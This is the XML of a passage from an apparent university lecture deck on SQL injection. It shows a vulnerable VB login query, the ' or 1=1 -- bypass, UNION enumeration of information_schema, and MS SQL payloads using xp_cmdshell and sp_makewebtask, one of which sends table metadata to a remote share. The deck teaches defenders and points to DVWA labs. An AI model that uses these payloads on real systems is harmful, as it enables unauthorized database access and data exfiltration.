        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Most web application interacts with database to persistently store data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Connection to database requires login credentials to be presented during execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Interface to database are typically through construction of ‘queries’ using SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Basics Demo Videos (Part 1 and 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>http://www.youtube.com/watch?v=h-9rHTLHJTY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>http://www.youtube.com/watch?v=w3xbytAisB0</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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Consider the following VB codes:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>query1 = “SELECT user, password FROM users WHERE user = ‘&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Request.Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(“username”) &amp;’ and password = ‘&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Request.Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(“pass”) &amp;’”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Programmers may assume user will always key in username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL injection – technique where attackers manipulate the input data so as to execute query other than the intended one.</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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Simple injection with </a:t>
            </a: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or 1=1 - - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Select * from user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or 1=1 - - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Always true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>If used for login processing, the first record being returned will be the login user</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Injection Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Effects of SQL injection can also be to cause error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Error messages can reveal important data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>These data can in turn be used to perform further exploitation</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Error Message</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Inject quotes such as ‘ ” reveal details of query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. We know now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> is a column name for password</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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect b="34897"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="2924945"/>
            <a:ext cx="8604250" cy="3744416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596336" y="4005064"/>
            <a:ext cx="124286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Vulnerable Web Apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are many sample web applications created with vulnerabilities for learning purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples : DVWA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Webgoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Badstore</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Install DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practical 6 Exercises 1 and 2</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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out Table Column</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL injection requires creativity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ and pass = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> can be used to guess column names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> is NOT a column, an error like:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>“Invalid Column ‘pass’ ” will appear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>You can keep on guessing other column names!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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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 Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Most databases has tables that store information about the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Called Metadata (data about data) or data dictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL Server and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(version 5.0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL Standard (ISO/IEC 9075-11:2003)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Information_Schema.tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Using UNION to find out tables names and columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>’ union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Number of columns in UNION operation MUST match </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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Cycle through the entire table names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>’ union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> NOT in (‘CHARACTER_SETS’) --</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5035550" y="3357563"/>
            <a:ext cx="410845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out column names</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Using same method as finding out table names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>’ union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>=‘user’ --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Stored Procedures</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Most databases have stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Similar to functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Typical use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Data validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Batch processing </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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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MS SQL Stored Procedures</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Start with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ ; EXEC … --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe /c dir c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; c:\dir.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’ –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Writes the list of files and folders names into c:\dir.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXEC master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sp_makewebtask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"\\10.10.1.3\share\output.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="996633"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"SELECT * FROM INFORMATION_SCHEMA.TABLES“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Executes the metadata query and sends it to remote folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Using same technique, you can even retrieve other important files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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Blind SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Advanced SQL injection technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Does not respond with a retrieval of data from the database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
